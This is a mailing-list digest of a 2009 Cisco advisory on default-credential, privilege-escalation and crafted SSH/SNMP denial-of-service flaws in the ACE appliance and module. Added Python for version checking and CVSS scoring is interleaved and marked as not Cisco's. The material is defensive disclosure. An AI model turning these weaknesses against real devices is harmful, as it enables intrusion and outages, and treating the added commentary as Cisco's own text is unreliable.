All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJpWeb86n/Gc8U/uARAty+AKCIt9MQ0A+BzIMX+MBZHjiod59WBACeMUgH
rPsjG9qKmCDQlA6XlaLFMr0=
=6x6Q
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE
Application Control Engine Module and Cisco ACE 4710 Application
Control Engine
Document ID: 109450
Advisory ID: cisco-sa-20090225-ace
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
The Cisco ACE Application Control Engine Module and the Cisco ACE 4710
Application Control Engine contain multiple vulnerabilities that, if
exploited, could result in any of the following impacts:
* Administrative level access via default user names and passwords
* Privilege escalation
* A denial of service (DoS) condition
Cisco has released free software updates that address these
vulnerabilities for affected customers. Workarounds that mitigate some
of the vulnerabilities are available.
Note: These vulnerabilities are independent of each other. A device
may be affected by one vulnerability and not affected by another.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
Note: This advisory is being released simultaneously with a multiple
vulnerability disclosure advisory that impacts the Cisco 4700 Series
Application Control Engine Device Manager and Application Networking
Manager module software.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
Affected Products
=================
Vulnerable Products
+------------------
The following table displays the products that are affected by each
vulnerability that is described within this advisory.
+--------------------------------------+-------------------------------+-------------------------------+
| Vulnerability                        | Cisco ACE 4710 Appliance      | Cisco ACE Module              |
|--------------------------------------+-------------------------------+-------------------------------|
| Default Usernames and Passwords      | All versions prior to A1(8a)  | All versions prior to A2(1.1) |
| Privilege Escalation Vulnerability   | All versions prior to A1(8a)  | All versions prior to A2(1.2) |
| Crafted SSH Packet Vulnerability     | All versions prior to A3(2.1) | All versions prior to A2(1.3) |
| Crafted SNMPv2c Packet Vulnerability | All versions prior to A3(2.1) | All versions prior to A2(1.3) |
| Crafted SNMPv3 Packet Vulnerability  | All versions prior to A1(8.0) | All versions prior to A2(1.2) |
+--------------------------------------+-------------------------------+-------------------------------+
Determining Software Versions
+----------------------------
To display the version of system software that is currently running
on Cisco ACE Application Control Engine, use the show version
command. The following example displays the output of the show
version command on the Cisco ACE Application Control Engine software
version A3(1.0):
ACE-4710/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 1985-2008 by Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html
Software
loader: Version 0.95
system: Version A3(1.0) [build 3.0(0)A3(0.0.148) adbuild_03:31:25-2008/08/06_/auto/adbure_nightly2/nightly_rel_a3_1_0_throttle/REL_3_0_0_A3_0_0
system image file: (nd)/192.168.65.31/scimitar.bin
Device Manager version 1.1 (0) 20080805:0415
...
<output truncated>
The following example displays the output of the show version command
on a Cisco ACE Application Control Engine module software version A1(1):
ACE-mod/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 2002-2006, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html
Software
loader: Version 12.2[117]
system: Version 3.0(0)A1(1) [build 3.0(0)A1(1) _01:26:21-2006/03/13_/auto/adbu-rel/ws/REL_3_0_0_A1_1]
system image file: [LCP] disk0:c6ace-t1k9-mzg.3.0.0_A1_1.bin
licensed features: no feature license is installed
...
<output truncated>
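Added example, not Cisco's code: a checker that turns the "all versions prior to" table above and the show version output into a per-device answer. It pulls the A-train version out of the "system:" line (A3(1.0) on the appliance sample, the A1(1) inside 3.0(0)A1(1) on the module sample) and compares it against the first-fixed version for each vulnerability on the given platform. Two things are assumptions of this example rather than statements from the advisory: a lettered rebuild such as A1(8a) is ordered after the plain A1(8) / A1(8.0) of the same number, and the platform ("appliance" or "module") is supplied by the caller rather than inferred from the output. The table gives A2(1.2) as the module's first fixed version for the privilege escalation bug while the Details section says A2(1.3); the table value is used below, so confirm that entry against the advisory before acting on it.

```python
import re

# Added example, not Cisco's code. "First fixed" versions are taken from the
# advisory's Vulnerable Products table: every version prior to the listed one
# is affected. For the module's privilege-escalation bug the table says
# A2(1.2) while the Details section says A2(1.3); the table value is used here.
FIXED_IN = {
    "appliance": {  # Cisco ACE 4710
        "default-credentials": "A1(8a)",
        "privilege-escalation": "A1(8a)",
        "crafted-ssh": "A3(2.1)",
        "crafted-snmpv2c": "A3(2.1)",
        "crafted-snmpv3": "A1(8.0)",
    },
    "module": {  # Cisco ACE module for Catalyst 6500 / 7600
        "default-credentials": "A2(1.1)",
        "privilege-escalation": "A2(1.2)",
        "crafted-ssh": "A2(1.3)",
        "crafted-snmpv2c": "A2(1.3)",
        "crafted-snmpv3": "A2(1.2)",
    },
}

# Matches the A-train part of an ACE version: A1(8a), A2(1.3), A3(1.0), and
# the A1(1) inside "3.0(0)A1(1)".
_VERSION_RE = re.compile(r"A(\d+)\((\d+)(?:\.(\d+))?([a-z])?\)")


def parse_version(text):
    """Return a comparable key (train, major, minor, rebuild) for the first
    ACE A-train version found in text, or None if there is none.

    Assumption (not stated by Cisco): a lettered rebuild such as A1(8a) sorts
    after the plain release A1(8) / A1(8.0) with the same number, and a
    missing minor number counts as 0.
    """
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    train, major, minor, rebuild = m.groups()
    rebuild_rank = (ord(rebuild) - ord("a") + 1) if rebuild else 0
    return (int(train), int(major), int(minor or 0), rebuild_rank)


def running_version(show_version_output):
    """Pull the running version out of 'show version' output by reading the
    'system:' line, as in the two excerpts in the advisory."""
    for line in show_version_output.splitlines():
        if line.strip().startswith("system:"):
            return parse_version(line)
    return None


def affected(platform, version):
    """Return the sorted names of the advisory's vulnerabilities that a
    device of the given platform ('appliance' or 'module') running the given
    version (a version string or a parse_version() key) is affected by."""
    running = version if isinstance(version, tuple) else parse_version(version)
    if running is None:
        raise ValueError(f"no ACE version found in {version!r}")
    return sorted(
        name for name, fixed in FIXED_IN[platform].items()
        if running < parse_version(fixed)
    )


# Constructed sample: the 'system:' line of an ACE 4710 running A3(1.0),
# shaped like the advisory's first 'show version' excerpt.
SAMPLE_APPLIANCE_OUTPUT = """\
Cisco Application Control Software (ACSW)
Software
  loader:    Version 0.95
  system:    Version A3(1.0) [build 3.0(0)A3(0.0.148)]
  system image file: (nd)/192.168.65.31/scimitar.bin
"""

if __name__ == "__main__":
    key = running_version(SAMPLE_APPLIANCE_OUTPUT)
    print("running:", key)
    print("affected:", affected("appliance", key))
```

For the appliance sample the result is the two A3(2.1) fixes (crafted SSH and SNMPv2c), which matches reading the table by hand; the point of the script is running it across an inventory of show version captures rather than doing that reading per device.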
Products Confirmed Not Vulnerable
+--------------------------------
The Cisco ACE XML Gateway, the Cisco ACE Web Application Firewall,
and the Cisco ACE GSS 4400 Series Global Site Selector Appliances are
not affected by any of the vulnerabilities that are described in this
advisory. No other Cisco products are currently known to be affected
by these vulnerabilities.
Details
=======
The Cisco ACE 4710 Application Control Engine appliance and the Cisco
ACE Application Control Engine Module for Cisco Catalyst 6500 Series
Switches and Cisco 7600 Series Routers are a load-balancing and
application-delivery solution for data centers. Multiple
vulnerabilities exist in both products. The following information
provides the details about each of the vulnerabilities that are
addressed in this advisory.
Default Usernames and Passwords
+------------------------------
Versions of the Cisco ACE 4710 Application Control Engine appliance
prior to software version A1(8a) use default administrator, web
management, and device management account credentials. Similarly,
software versions of the Cisco ACE Application Control Engine Module
prior to software version A2(1.1) use default administrator and web
management credentials. The appliance and module do not prompt users
to modify system account passwords during the initial configuration
process. An attacker with knowledge of these accounts could modify
the application configuration and, in certain instances, gain user
access to the host operating system.
This vulnerability is documented in the following Cisco Bug IDs and
has been assigned the following Common Vulnerability and Exposures
(CVE) IDs:
* Cisco ACE Application Control Engine Module: CSCsq43828 (
registered customers only) - CVE-2009-0620
* Cisco ACE Application Control Engine Appliance: CSCsq43229 (
registered customers only) - CVE-2009-0621
A third account, used by the Cisco 4700 Series Application Control
Engine Appliance Device Manager, also uses default credentials. Only
the Cisco ACE 4710 Application Control Engine appliance is affected
by this vulnerability. It is documented in Cisco Bug ID CSCsq32379
( registered customers only) and has also been assigned the Common
Vulnerability and Exposures (CVE) ID CVE-2009-0621.
Privilege Escalation Vulnerability
+---------------------------------
A vulnerability exists in versions of the Cisco ACE 4710 Application
Control Engine appliance prior to A1(8a) and the Cisco ACE
Application Control Engine Module prior to version A2(1.3). An
authenticated user could exploit this vulnerability to invoke
administrative commands via the device command line interface (CLI).
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsq48546 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsq09839 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0622.
Crafted SSH Packet Vulnerability
+-------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A3(2.1) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.3).
An attacker could exploit this vulnerability to cause the device to
reload by sending a crafted SSH packet to it.
Note: SSH access must be configured on the affected device for it to
be vulnerable. SSH access is not enabled by default. A full TCP
three-way handshake is not necessary to trigger the effects of this
vulnerability, so the source address of the triggering packet can be
spoofed; filtering on trusted source addresses alone should not be
relied on as protection.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsv01877 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsv01738 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0623.
Crafted SNMPv2c Packet Vulnerability
+-----------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A3(2.1) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.3).
An attacker who can authenticate to the SNMP agent (for SNMPv2c, one
who knows a configured community string) could send a crafted SNMPv2c
packet to an affected device to cause it to reload.
Note: SNMPv2c must be explicitly configured in an affected device in
order to process any SNMPv2c transactions. SNMPv2c is not enabled by
default.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsu36038 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCsu47876 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0624.
Crafted SNMPv3 Packet Vulnerability
+----------------------------------
A vulnerability exists in the Cisco ACE 4710 Application Control
Engine appliance prior to software version A1(8.0) and the Cisco ACE
Application Control Engine Module prior to software version A2(1.2).
An attacker could cause the device to reload by sending a crafted
SNMPv3 packet to it.
Note: SNMPv3 must be explicitly configured in an affected device in
order to process any SNMPv3 transactions. SNMPv3 is not enabled by
default.
This vulnerability is documented in the following Cisco Bug IDs:
* Cisco ACE Application Control Engine Module: CSCsq45432 (
registered customers only)
* Cisco ACE 4710 Application Control Engine Appliance: CSCso83126 (
registered customers only)
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0625.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsq43828 and CSCsq43229 - Default users and passwords on ACE module
and appliance
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsq32379 - DM Default Account Credentials
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsq48546 and CSCsq09839 - Privilege escalation issue on ACE Module
and ACE Appliance
CVSS Base Score - 9
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsv01877 and CSCsv01738 - Crafted SSH packet may cause ACE module
or appliance to reload
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsu36038 and CSCsu47876 - Crafted SNMPv2c packet may crash ACE
module and appliance
CVSS Base Score - 6.8
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 5.6
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCso83126 and CSCsq45432 - Crafted SNMPv3 packet may crash ACE
appliance
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
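As an added example (not part of the advisory), the following Python reproduces the CVSS v2.0 base and temporal arithmetic for the vectors listed above and shows how the environmental score the text leaves to customers would be computed; the metric weights are those of the CVSS v2.0 guide, and the vulnerability entries are copied from the scoring details.

```python
"""CVSS v2.0 base, temporal and environmental arithmetic, checked against
the vectors printed in this advisory. Added example, not Cisco code: the
weights come from the CVSS v2.0 guide, the entries from the list above."""
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2.0 specification (kept as strings so the
# Decimal arithmetic below is exact).
AV = {"Local": "0.395", "Adjacent": "0.646", "Network": "1.0"}
AC = {"High": "0.35", "Medium": "0.61", "Low": "0.71"}
AU = {"Multiple": "0.45", "Single": "0.56", "None": "0.704"}
CIA = {"None": "0", "Partial": "0.275", "Complete": "0.660"}
E = {"Unproven": "0.85", "Proof-of-Concept": "0.9", "Functional": "0.95", "High": "1.0"}
RL = {"Official-Fix": "0.87", "Temporary-Fix": "0.90", "Workaround": "0.95", "Unavailable": "1.0"}
RC = {"Unconfirmed": "0.90", "Uncorroborated": "0.95", "Confirmed": "1.0"}
# Environmental metrics, which the advisory leaves to the customer.
CDP = {"None": "0", "Low": "0.1", "Low-Medium": "0.3", "Medium-High": "0.4", "High": "0.5"}
TD = {"None": "0", "Low": "0.25", "Medium": "0.75", "High": "1.0"}
REQ = {"Low": "0.5", "Medium": "1.0", "High": "1.51"}  # CR, IR and AR


def _d(table, key):
    return Decimal(table[key])


def _round1(x):
    # CVSS rounds half up to one decimal; Python's round() would not.
    return float(x.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def base_score(av, ac, au, c, i, a, cr="Medium", ir="Medium", ar="Medium"):
    """Base score. With CR/IR/AR other than Medium this is the adjusted base
    score of the environmental formula, where impact is capped at 10."""
    impact = Decimal("10.41") * (1 - (1 - _d(CIA, c) * _d(REQ, cr))
                                 * (1 - _d(CIA, i) * _d(REQ, ir))
                                 * (1 - _d(CIA, a) * _d(REQ, ar)))
    if (cr, ir, ar) != ("Medium", "Medium", "Medium"):
        impact = min(impact, Decimal("10"))
    exploitability = 20 * _d(AV, av) * _d(AC, ac) * _d(AU, au)
    f_impact = Decimal("0") if impact == 0 else Decimal("1.176")
    return _round1((Decimal("0.6") * impact + Decimal("0.4") * exploitability
                    - Decimal("1.5")) * f_impact)


def temporal_score(base, e, rl, rc):
    return _round1(Decimal(str(base)) * _d(E, e) * _d(RL, rl) * _d(RC, rc))


def environmental_score(vector, temporal, cdp, td, cr, ir, ar):
    """Re-derive base and temporal with this network's security
    requirements, then apply collateral damage and target distribution."""
    adj_base = base_score(*vector, cr=cr, ir=ir, ar=ar)
    adj_temporal = Decimal(str(temporal_score(adj_base, *temporal)))
    return _round1((adj_temporal + (10 - adj_temporal) * _d(CDP, cdp)) * _d(TD, td))


# Entries as printed in the advisory: vector, temporal metrics, stated scores.
ADVISORY = {
    "CSCsq43828/CSCsq43229 default users and passwords":
        (("Network", "Low", "None", "Complete", "Complete", "Complete"),
         ("High", "Official-Fix", "Confirmed"), 10.0, 8.7),
    "CSCsq48546/CSCsq09839 privilege escalation":
        (("Network", "Low", "Single", "Complete", "Complete", "Complete"),
         ("Functional", "Official-Fix", "Confirmed"), 9.0, 7.4),
    "CSCsv01877/CSCsv01738 crafted SSH packet":
        (("Network", "Low", "None", "None", "None", "Complete"),
         ("Functional", "Official-Fix", "Confirmed"), 7.8, 6.4),
    # Au:Single is what makes this one 6.8 rather than 7.8; it matches the
    # "authenticated attacker" wording of the Details section.
    "CSCsu36038/CSCsu47876 crafted SNMPv2c packet":
        (("Network", "Low", "Single", "None", "None", "Complete"),
         ("Functional", "Official-Fix", "Confirmed"), 6.8, 5.6),
}


def check_advisory(entries=ADVISORY):
    """Return {name: (base, temporal)} for entries whose recomputed scores
    differ from the printed ones; empty when everything reproduces."""
    mismatches = {}
    for name, (vector, temporal, stated_base, stated_temporal) in entries.items():
        base = base_score(*vector)
        temp = temporal_score(base, *temporal)
        if (base, temp) != (stated_base, stated_temporal):
            mismatches[name] = (base, temp)
    return mismatches


if __name__ == "__main__":
    print("mismatches:", check_advisory())
    # A network where the ACE's availability is critical: the SSH reload
    # bug rises from 6.4 (temporal) to 8.3 even with no collateral damage.
    print(environmental_score(ADVISORY["CSCsv01877/CSCsv01738 crafted SSH packet"][0],
                              ("Functional", "Official-Fix", "Confirmed"),
                              cdp="None", td="High", cr="Medium", ir="Medium", ar="High"))
```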
Impact
======
An attacker with knowledge of the Default Usernames and Passwords
Vulnerability accounts could modify the device configuration and, in
certain instances, gain user access to the host operating system.
An exploit of the Privilege Escalation Vulnerability could allow an
authenticated attacker to execute host operating system
administrative commands.
Successful exploitation of the Crafted SSH Packet Vulnerability,
Crafted SNMPv2 Packet Vulnerability, and Crafted SNMPv3 Packet
Vulnerability may cause a reload of the affected device. Repeated
exploitation could result in a sustained DoS condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table (below) lists, in the "First Fixed
Release" column, the earliest possible releases that contain the fix
(along with the anticipated date of availability for each, if
applicable). The "Recommended Release" column indicates the releases
that have fixes for all the published vulnerabilities at the time of
this Advisory. A device running a release in the given train that is
earlier than the release in a specific column (less than the First
Fixed Release) is known to be vulnerable. Cisco recommends upgrading to
a release equal to or later than the release in the "Recommended
Release" column of the table.
+------------------------------------+-----------------------------+-----------------------------+
|                                    | Cisco ACE 4710 Appliance    | Cisco ACE Module            |
| Vulnerability                      |--------------+--------------|--------------+--------------|
|                                    | First Fixed  | Recommended  | First Fixed  | Recommended  |
|                                    | Release      | Release      | Release      | Release      |
|------------------------------------+--------------+--------------+--------------+--------------|
| Default Usernames and Passwords    | A1(8a)       | A3(2.1)      | A2(1.1)      | A2(1.3)      |
|------------------------------------+--------------+--------------+--------------+--------------|
| Privilege Escalation Vulnerability | A1(8a)       | A3(2.1)      | A2(1.2)      | A2(1.3)      |
|------------------------------------+--------------+--------------+--------------+--------------|
| Crafted SSH Packet Vulnerability   | A3(2.1)      | A3(2.1)      | A2(1.3)      | A2(1.3)      |
|------------------------------------+--------------+--------------+--------------+--------------|
| Crafted SNMPv2 Packet              | A3(2.1)      | A3(2.1)      | A2(1.3)      | A2(1.3)      |
| Vulnerability                      |              |              |              |              |
|------------------------------------+--------------+--------------+--------------+--------------|
| Crafted SNMPv3 Packet              | A1(8.0)      | A3(2.1)      | A2(1.2)      | A2(1.3)      |
| Vulnerability                      |              |              |              |              |
+------------------------------------+--------------+--------------+--------------+--------------+
Cisco ACE module software can be downloaded from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=280557289
Cisco ACE 4710 Application Control Engine appliance software can be
downloaded from:
http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=281222179
Workarounds
===========
This Security Advisory describes multiple distinct vulnerabilities.
These vulnerabilities and their respective workarounds are
independent of each other.
Default Usernames and Passwords
+------------------------------
To change the default administrative password, use the username
command in configuration mode. The syntax of this command is as
follows:
username admin [password [0 | 5] {password}]
The keywords, arguments, and options are:
admin--Specifies the default administrative user name.
password--(Optional) Keyword that indicates that a password follows.
0--(Optional) Specifies a clear text password.
5--(Optional) Specifies an MD5-hashed strong encryption password.
password--The password in clear text, encrypted text, or MD5 strong
encryption, depending on the numbered option (0 or 5) that you enter.
If you do not enter a numbered option, the password is in clear text
by default. Enter a password as an unquoted text string with a
maximum of 64 characters.
For example, to create a user named admin that uses the clear text
password my_super_secret_88312, enter the following command:
ACE(config)# username admin password 0 my_super_secret_88312
Note: This process can also be followed to change the www user
account credentials. The dm user is for accessing the Device Manager
GUI and cannot be modified or deleted. The dm user is an internal
user required by the Device Manager GUI; it is hidden on the ACE CLI.
For more information refer to:
http://www.cisco.com/en/US/docs/app_ntwk_services/data_center_app_services/ace_appliances/vA3_1_0/configuration/virtualization/guide/config.html
Privilege Escalation Vulnerability
+---------------------------------
There are no workarounds for this vulnerability.
Crafted SSH Packet Vulnerability
+-------------------------------
SSH management traffic that can be received by the ACE is controlled
through the use of class maps, policy maps, and service policies.
This Management Traffic Service example denies unauthorized SSH
packets that are sent to an affected device. In the following
example, 192.168.100.1 is considered a trusted source that requires
SSH access to the affected device. Care should be taken to allow all
required management access to the affected device. An attacker could
exploit this vulnerability using spoofed packets. This workaround
cannot provide complete protection against this vulnerability when
the attack comes from a trusted source address.
The following example demonstrates how SSH access to the ACE is only
allowed from the 192.168.100.1 host:
!-- Configure a class to allow SSH from the trusted source
!
class-map type management match-all Permit_SSH_Class
  description Allow SSH from trusted sources Class
  match protocol ssh source-address 192.168.100.1 255.255.255.255
!
!-- Configure a management policy that allows ssh from the
!-- trusted source configured in the above class
!
policy-map type management first-match Permit_SSH_Policy
  description Allow SSH from trusted sources Policy
  class Permit_SSH_Class
    permit
!
!-- Apply the management policy globally
!
service-policy input Permit_SSH_Policy
Additional information about "Configuring SSH Management Sessions" is
available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/access.html#wp1049450
Additional information about "Configuring Class Maps and Policy Maps"
is available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/mapolcy.html
Warning: It is possible to easily spoof the sender's IP address, which
may defeat class maps and access control lists (ACLs) that permit
communication to the device from trusted IP addresses.
Crafted SNMPv2 and SNMPv3 Packet Vulnerabilities
+-----------------------------------------------
SNMP management traffic that can be received by the ACE is controlled
through the use of class maps, policy maps, and service policies.
This Management Traffic Service example denies unauthorized SNMP
packets on UDP port 161 that are sent to an affected device. In the
following example, 192.168.100.1 is considered a trusted source that
requires SNMP access to the affected device. Care should be taken to
allow all required management access to the affected device. An
attacker could exploit this vulnerability using spoofed packets. This
workaround cannot provide complete protection against this
vulnerability when the attack comes from a trusted source address.
!-- Configure a class to allow SNMP from the trusted source
!
class-map type management match-all Permit_SNMP_Class
  description Allow SNMP from trusted sources Class
  2 match protocol snmp source-address 192.168.100.1 255.255.255.255
!
!-- Configure a management policy that allows snmp from the
!-- trusted source configured in the above class
!
policy-map type management first-match Permit_SNMP_Policy
  description Allow SNMP from trusted sources Policy
  class Permit_SNMP_Class
    permit
!
!-- Apply the management policy globally
!
service-policy input Permit_SNMP_Policy
Additional information about "SNMP Management Traffic Services" is
available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/snmp.html#wp1034011
Additional information about "Configuring Class Maps and Policy Maps"
is available at:
http://www.cisco.com/en/US/docs/interfaces_modules/services_modules/ace/v3.00_A1/configuration/administration/guide/mapolcy.html
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090225-ace.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were found during internal testing.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+-------------------------------------------------------------------+
| Revision 1.0 | 2009-February-25 | Initial public release |
+-------------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
--- End Message ---
--- Begin Message ---
Cisco Security Advisory: Cisco ACE Application Control Engine Device
Manager and Application Networking Manager Vulnerabilities
Advisory ID: cisco-sa-20090225-anm
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
Revision 1.0
For Public Release 2009 February 25 1600 UTC (GMT)
Summary
=======
Multiple vulnerabilities exist in the Cisco Application Networking
Manager (ANM) and Cisco Application Control Engine (ACE) Device
Manager applications. These vulnerabilities are independent of each
other. Successful exploitation of these vulnerabilities may result in
unauthorized system or host operating system access.
This security advisory identifies the following vulnerabilities:
* ACE Device Manager and ANM invalid directory permissions
vulnerability
* ANM default user credentials vulnerability
* ANM MySQL default credentials vulnerability
* ANM Java agent privilege escalation
Cisco has released free software updates that address these
vulnerabilities. A workaround that mitigates one of the issues is
available.
This advisory is posted at
